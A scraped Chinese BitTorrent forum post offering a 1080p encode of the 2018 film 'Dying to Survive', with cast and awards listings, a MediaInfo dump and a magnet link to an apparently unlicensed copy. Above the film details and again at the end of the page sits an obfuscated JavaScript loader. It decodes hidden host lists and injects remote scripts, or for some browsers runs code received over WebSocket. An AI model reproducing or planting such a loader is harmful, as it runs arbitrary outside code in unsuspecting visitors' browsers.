我不是药神[国语配音/中文字幕].Dying.To.Survive.2018.1080p.BluRay.x265.10bits.DTS.7.1 7.06GB

版主小s 1月前 318

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 我不是药神 / 中国药神 / 印度药神 / 印度药商 / 生命之路 / Dying to Survive / Drug Dealer

◎年 代 2018

◎产 地 中国大陆

◎类 别 剧情 / 喜剧

◎语 言 汉语普通话 / 英语 / 上海话 / 印地语

◎上映日期 2018-07-05(中国大陆) / 2018-06-30(大规模点映)

◎IMDb链接 https://www.imdb.com/title/tt7362036/

◎豆瓣评分 9.0/10 (1799988人评价)

◎豆瓣链接 https://movie.douban.com/subject/26752088/

◎片 长 117分钟

◎导 演 文牧野 Muye Wen (id:1349765)

◎编 剧 韩家女 Jianü Han (id:1375690)

钟伟 Wei Zhong (id:1391650)

文牧野 Muye Wen (id:1349765)

◎演 员 徐峥 Zheng Xu (id:1274297)

王传君 Chuanjun Wang (id:1313837)

周一围 Yiwei Zhou (id:1276085)

谭卓 Zhuo Tan (id:1312976)

章宇 Yu Zhang (id:1322072)

杨新鸣 Xinming Yang (id:1275510)

王佳佳 Jiajia Wang (id:1317520)

王砚辉 Yanhui Wang (id:1322085)

贾晨飞 Chenfei Jia (id:1391651)

龚蓓苾 Beibi Gong (id:1274298)

宁浩 Hao Ning (id:1274265)

李乃文 Naiwen Li (id:1274530)

岳小军 Xiaojun Yue (id:1310743)

苇青 Qing Wei (id:1319163)

富冠铭 Guanming Fu (id:1396851)

巴拉特·巴蒂 Bharat Bhatia (id:1396800)

喜利图 Keith Shillitoe (id:1396458)

张海艳 Haiyan Zhang (id:1396812)

朱耕佑 Gengyou Zhu (id:1396885)

张子贤 Zixian Zhang (id:1374201)

邓飞 Fei Deng (id:1365659)

任洛敏 Luomin Ren (id:1372200)

杜子蓝 Zilan Du (id:1409406)

刘兴雷 Xinglei Liu (id:1409670)

杜家毅 Jiayi Du (id:1275274)

宁晓志 Xiaozhi Ning (id:1316229)

刘頔 Di Liu (id:1343944)

马千壹 Qianyi Ma (id:1375601)

石强 Qiang Shi (id:1353001)

甘昀宸 Yunchen Gan (id:1424274)

何李宁 Lining He (id:1353432)

陈翃 Hong Chen (id:1396799)

王易冰 Yibing Wang (id:1381922)

刘瑞芳 Ruifang Liu (id:1396881)

宋歌 Ge Song (id:1318488)

宁浩 Hao Ning (id:1274265)

徐峥 Zheng Xu (id:1274297)

张苗 Miao Zhang (id:1396882)

施雁 Yan Shi (id:1396801)

郑志昊 Zhihao Zheng (id:1397531)

董平 Ping Dong (id:1380636)

曾茂军 Maojun Zeng (id:1397615)

陈砺志 Lizhi Chen (id:1400325)

樊路远 Luyuan Fan (id:1423414)

李捷 Jie Li (id:1403835)

刘明轶 Mingyi Liu (id:1341091)

康利 Li Kang (id:1397561)

郑剑锋 Kim Fung Cheng (id:1369198)

讲武生 Wusheng Jiang (id:1410624)

吴宏亮 Hongliang Wu (id:1418014)

杨伟东 Weidong Yang (id:1381888)

杨硕 Shuo Yang (id:1400333)

周健森 Jiansen Zhou (id:1443517)

项绍琨 Shaokun Xiang (id:1397285)

岳洋 Yang Yue (id:1442014)

韩璐 Liz Han (id:1453964)

尹哲 Zhe Yin (id:1384751)

黄超 Chao Huang (id:1396798)

王博学 Boxue Wang (id:1393735)

曹勇 Yong Cao (id:1396804)

朱琳 Lin Zhu (id:1378385)

刘畅 Lani Liu (id:1408611)

李淼 Miao Li (id:1327416)

张朋 Zhang Peng (id:1375784)

李同 Tong Li (id:1396536)

毛伟良 Weiliang Mao (id:1396802)

李淼 Miao Li (id:1327416)

尚进 Jin Shang (id:1396803)

舒巴姆·古普塔 Shubham Gupta (id:1396426)

高拉夫·德文·考沙尔 Gaurav Dev Kaushal (id:1396425)

张岩 Yan Zhang (id:1430244)

富康 Kang Fu (id:1325306)

瑞安·D·罗梅罗 Ryan D. Romero (id:1396424)

陈纯昆 Chun-Kun Chen (id:1325047)

张海艳 Haiyan Zhang (id:1396812)

黄海 Hai Huang (id:1401245)

尚巍 Wei Shang (id:1460870)

◎标 签 人性 / 社会 / 真实事件改编 / 生命 / 中国大陆 / 剧情 / 药 / 黑色幽默

◎简 介

普通中年男子程勇(徐峥 饰)经营着一家保健品店,失意又失婚。不速之客吕受益(王传君 饰)的到来,让他开辟了一条去印度买药做“代购”的新事业,虽然困难重重,但他在这条“买药之路”上发现了商机,一发不可收拾地做起了治疗慢粒白血病的印度仿制药独家代理商。赚钱的同时,他也认识了几个病患及家属,为救女儿被迫做舞女的思慧(谭卓 饰)、说一口流利“神父腔”英语的刘牧师(杨新鸣 饰),以及脾气暴烈的“黄毛”(章宇 饰),几个人合伙做起了生意,利润倍增的同时也危机四伏。程勇昔日的小舅子曹警官(周一围 饰)奉命调查仿制药的源头,假药贩子张长林(王砚辉 饰)和瑞士正牌医药代表(李乃文 饰)也对其虎视眈眈,生意逐渐变成了一场关于救赎的拉锯战。

本片改编自慢粒白血病患者陆勇代购抗癌药的真实事迹。

◎获奖情况 (共36项)

第55届台北金马影展 (2018)

金马奖 最佳剧情片(提名)

金马奖 最佳男主角

└──徐峥 (id:1274297)

金马奖 最佳男配角(提名)

└──章宇 (id:1322072)

金马奖 最佳原著剧本

金马奖 最佳新导演

└──文牧野 (id:1349765)

金马奖 最佳造型设计(提名)

└──李淼 (id:1327416)

金马奖 最佳剪辑(提名)

└──朱琳 (id:1378385)

第38届香港电影金像奖 (2019)

最佳两岸华语电影

└──文牧野 (id:1349765)

第32届中国电影金鸡奖 (2019)

最佳故事片(提名)

最佳编剧(提名)

最佳男主角(提名)

└──徐峥 (id:1274297)

最佳男配角(提名)

最佳导演处女作

└──文牧野 (id:1349765)

最佳美术(提名)

└──李淼 (id:1327416)

最佳剪辑(提名)

└──朱琳 (id:1378385)

第35届大众电影百花奖 (2020)

优秀故事片

最佳编剧(提名)

最佳男配角

└──王传君 (id:1313837)

最佳新人(提名)

└──文牧野 (id:1349765)

第13届亚洲电影大奖 (2019)

最佳电影(提名)

最佳男主角(提名)

└──徐峥 (id:1274297)

最佳男配角

└──章宇 (id:1322072)

最佳编剧(提名)

第14届中国长春电影节 (2018)

金鹿奖 最佳华语故事片

金鹿奖 最佳编剧

金鹿奖 最佳男主角

└──徐峥 (id:1274297)

金鹿奖 最佳男配角

└──王传君 (id:1313837)

第19届华语电影传媒大奖 (2019)

最佳编剧

第26届北京大学生电影节 (2019)

最佳影片奖(提名)

最佳导演奖

└──文牧野 (id:1349765)

最佳男演员奖

└──徐峥 (id:1274297)

最佳新人奖

└──章宇 (id:1322072)

第6届豆瓣电影年度榜单 (2019)

2010s电影(提名)

第5届豆瓣电影年度榜单 (2018)

评分最高的华语电影

最受关注的院线电影

评分最高的喜剧片

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 16031566450584244602810653597941708556 (0xC0F91405B6AD7D728D62C7D66DD370C)

  4. Complete name : [email protected]DDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.06 GiB

  8. Duration : 1 h 56 min

  9. Overall bit rate : 8 688 kb/s

  10. Movie name : Dying to survive - Blu-ray?

  11. Encoded date : UTC 2021-10-18 00:04:16

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 56 min

  23. Bit rate : 7 151 kb/s

  24. Width : 1 920 pixels

  25. Height : 1 040 pixels

  26. Display aspect ratio : 1.85:1

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.149

  33. Stream size : 5.81 GiB (82%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=18.5000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541049583 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1040 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Language : Chinese

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. ID in the original source medium : 4353 (0x1101)

  42. Format : DTS

  43. Format/Info : Digital Theater Systems

  44. Codec ID : A_DTS

  45. Duration : 1 h 56 min

  46. Bit rate mode : Constant

  47. Bit rate : 1 509 kb/s

  48. Channel(s) : 6 channels

  49. Channel layout : C L R Ls Rs LFE

  50. Sampling rate : 48.0 kHz

  51. Frame rate : 93.750 FPS (512 SPF)

  52. Bit depth : 16 bits

  53. Compression mode : Lossy

  54. Stream size : 1.23 GiB (17%)

  55. Title : Mandarin

  56. Language : Chinese

  57. Default : Yes

  58. Forced : No

  59. Original source medium : Blu-ray


  60. Text #1

  61. ID : 3

  62. ID in the original source medium : 4608 (0x1200)

  63. Format : PGS

  64. Muxing mode : zlib

  65. Codec ID : S_HDMV/PGS

  66. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  67. Duration : 1 h 51 min

  68. Bit rate : 22.1 kb/s

  69. Count of elements : 2710

  70. Stream size : 17.7 MiB (0%)

  71. Title : chs

  72. Language : Chinese

  73. Default : Yes

  74. Forced : No

  75. Original source medium : Blu-ray


  76. Text #2

  77. ID : 4

  78. ID in the original source medium : 4609 (0x1201)

  79. Format : PGS

  80. Muxing mode : zlib

  81. Codec ID : S_HDMV/PGS

  82. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  83. Duration : 1 h 51 min

  84. Bit rate : 32.5 kb/s

  85. Count of elements : 2726

  86. Stream size : 26.0 MiB (0%)

  87. Language : English

  88. Default : Yes

  89. Forced : No

  90. Original source medium : Blu-ray


  91. Menu

  92. 00:00:00.000 : en:第 01 章

  93. 00:08:56.208 : en:第 02 章

  94. 00:17:28.000 : en:第 03 章

  95. 00:28:10.625 : en:第 04 章

  96. 00:37:16.916 : en:第 05 章

  97. 00:51:39.125 : en:第 06 章

  98. 01:03:58.250 : en:第 07 章

  99. 01:11:11.791 : en:第 08 章

  100. 01:20:46.041 : en:第 09 章

  101. 01:32:55.250 : en:第 10 章

  102. 01:44:34.000 : en:第 11 章

  103. 01:51:10.333 : en:第 12 章


TAGS 剧情 喜剧

磁力链:
  • magnet:?xt=urn:btih:3EE8A5D415FAEC9FC4C19FC11BA4F7DDD51A5DF8

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};